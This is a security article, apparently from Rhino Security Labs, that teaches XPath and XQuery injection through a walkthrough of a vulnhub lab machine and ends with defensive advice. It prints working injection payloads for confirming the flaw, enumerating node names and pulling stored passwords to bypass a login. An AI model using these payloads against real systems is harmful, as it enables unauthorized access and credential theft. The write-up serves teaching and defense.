Rhino Security Labs

Practical XPath Injection: Attack and Defense Techniques

Practical XPath Injection Exploits

When auditing a web application it can be easy to overlook certain types of vulnerabilities if not systematically checking for each individually. Injection exploits are well known, and indeed they are listed as number one in the OWASP Top 10; however, in this article we will discuss an attack that is much less popular than SQL injection, XPath and XQuery injection.

What is XPATH and XQuery?

XPATH is a language that queries an XML document to locate a piece of information, find elements matching a certain pattern or containing an attribute. If the client has access to a piece of the XPath query being used, and this input is not being sanitized, the client will then have access to the entire XML document if they can determine its structure. This is because XPath differs from other database languages as there is no access controls or user authentication. XQuery is a super set of the XPath language that adds SQL-like syntax as well as some useful functions for querying the document.

Useful Query Statements

In order to exploit an XPath injection, we will first cover a few common functions and syntax of XPath queries that would indicate to us that a document is vulnerable. I’ll briefly cover some of the important XPath and XQuery syntax here, but the full documentation can be found on the w3schools website.

Selecting a Node

“nodename” – Select all nodes with nodename.

“/nodename” – Selects from the root node (the top most element in the document that is not xml).

“//nodename” – Selects from the current node.

“..” – Selects the parent of the current node.

“child” – Selecting all children of the current node.

Functions

“name(/node)” – Returns the node name of an element. If /node is invalid, returns empty.

“selector::node()” – Matches any node of selector.

Putting It All Together

To see how we can exploit this, we will review one part of the “Darknet” vulnerable machine located on vulnhub.com. As with most machines on vulnhub, the ultimate goal is to gain root access on the machine in any way possible. If you’re going to follow along and attempt the exercise yourself, it’s important to note that we have started roughly half way through the challenge for the point of demonstrating XPath injection.

When loading up our vulnerable website we see that we’re greeted with a secure logon portal for staff members. Earlier in the challenge, a pseudo SQL injection was needed to bypass a different virtual host. Attempting the same SQL injection failed on this portal and using SQL map to try and exploit the login failed as well, so we must find a different way to move forward.

The /xpanel/ path led to the login portal, which we were not able to bypass using SQL injection.

Navigating the website we discover the page /contact.php which takes an ID parameter to query which staff member you’ve requested. This parameter is a prime target for additional fuzzing, so as jumping off point we try SQL injection; however, it was not vulnerable to this attack. Our hunch tells us that it has to be querying something, so let’s assume it’s an XML document instead of a database.

The contact.php page, showing the email address for the user with the associated ID.

If the page was querying an xml document, we could assume that the query looks something like this: z

//user[@id=ID_FROM_URL]/email/text()

Assuming it’s using some sort of attribute selector, we can inject brackets to see how the application responds. If our ID was 2][2 instead of simply 2, the query would become

//user[@id=2][2]/email/text()

Functionally, the statement remains the same, yet we have altered the query directly. If we enter an invalid or false query, the XQuery will return nothing for us. We can confirm this as seen below in the screen shots, our successful injection yields a result in the contact page, while false statements return nothing.

The payload “1][1” injected into the ID parameter evaluates successfully, yielding the username.

The payload “last()-1 and 1=2” evaluates to false, as 1 never will equal to, thus the query fails and nothing is returned.

Now that we have confirmed the XPath injection and have a way to evaluate true and false statements in the response of the application, we can attempt to exploit this further. In order to execute useful arbitrary queries, we need to learn more about the structure of the document. We can discover node names in two ways, either via brute forcing the node names or guessing them from a word list.

he first method would essentially check the alpha numeric space using the function “starts-with” and enumerating nodes using the wildcard selectors or parent selectors. A query that would attempt to brute force would be something like

1=starts-with(name(..), ‘a’)

This evaluates true if the name does indeed start with an ‘a’ and false otherwise. We could then attempt to continue the chain into

1=starts-with(name(..), ‘aa’

to determine if the node starts with “aa” and so on and so forth. This method is slow, time consuming and should only be used as a last resort.

The second method takes a wordlist and attempts to guess node names in a similar fashion. From the cheat sheet mentioned above, the name function will return blank if no valid node is provided as input. Thus, we can do a guess and check method with a query like

INT=string-length(name(//NODE))

This query attempts to find the node and, if ran successfully, validates it against the length of the string (INT) to return true. If no valid node is found, the length will be zero, returning false.

Attack: Utilizing XPath and XQuery

Knowing our strategy, we can now attempt to build a script to enumerate the list of nodes. Essentially we must request the endpoint numerous times using the payload

1 and INT=string-length(name(//NODE))

where NODE is a value fed in from a file and INT is the length of the value given. We combined the Spanish and the big English wordlist from the “dirb” tool (a common directory busting tool used against web applications) with 20,000 different names to attempt. In a little over 3 minutes, the script completed and we were greeted with 6 discovered node names.

The enumeration attacker script to guess and check valid node names.

An interesting result above is “clave,” which is Spanish for the English word “password” and our target for bypassing the login. Knowing node names, we can also determine the amount of child elements they contain as well. Using the payload

INT=count(//NODE/child::node())

Incrementing the INT value until the statement is true for node name NODE will tell us how many children each node has. Copying and modifying the same script above yields the following results.

Modified attacker script determining children nodes using the query “?id=1 and INT=count(//NODE_NAME/child::node())”, where INT is an integer to be incremented until the statement returns true, and NODE_NAME is a valid node name from above.

Knowing each element has a child, we can now begin brute forcing different combos to yield separate results. In our scenario, we do not know the parent name of the node we are currently on (as we did not attempt to brute force it), so we must try all combos relative to root and the parent node to return results. To do this, our payload will look like

ID] /NODE1 | //NODE2 [ID

where ID is the ID of the user, and NODE1 and NODE2 are valid names from the enumerated nodes above. (Note: The “|” indicates the union of two queries.) Modifying the script once more yielded all combinations of these nodes, and retrieved the sensitive data we were after to bypass the login at /xpanel/.

Modified attacker script showing all combinations of valid nodes being executed as well as the data returned back to the application. The /clave node yielded the password for both user accounts, which allowed us to login to the administrative /xpanel/ directory.

Defense: Protecting Against XPath and XQuery Vulnerabilities

Much like SQL database injection, the best defense one could use against this attack is to use precompiled queries. These queries are preset before program execution, meaning that one can avoid the troublesome escaping of bad characters which could be implemented incorrectly. If a dynamic query must be executed, ensure that the characters used to break out of the context (such as the brackets in our example) are escaped properly before execution.

Conclusion

XPath injection is a great example of how an attacker can go from virtually no information about an application to discovering detailed information about the application, and allowing an attacker to compromise the administrative accounts. This by no means is a definitive guide to XPath and XQuery injection, but we hope that this attack walk through gives its audience a good grasp on the steps of an attack and how to defend an application against it.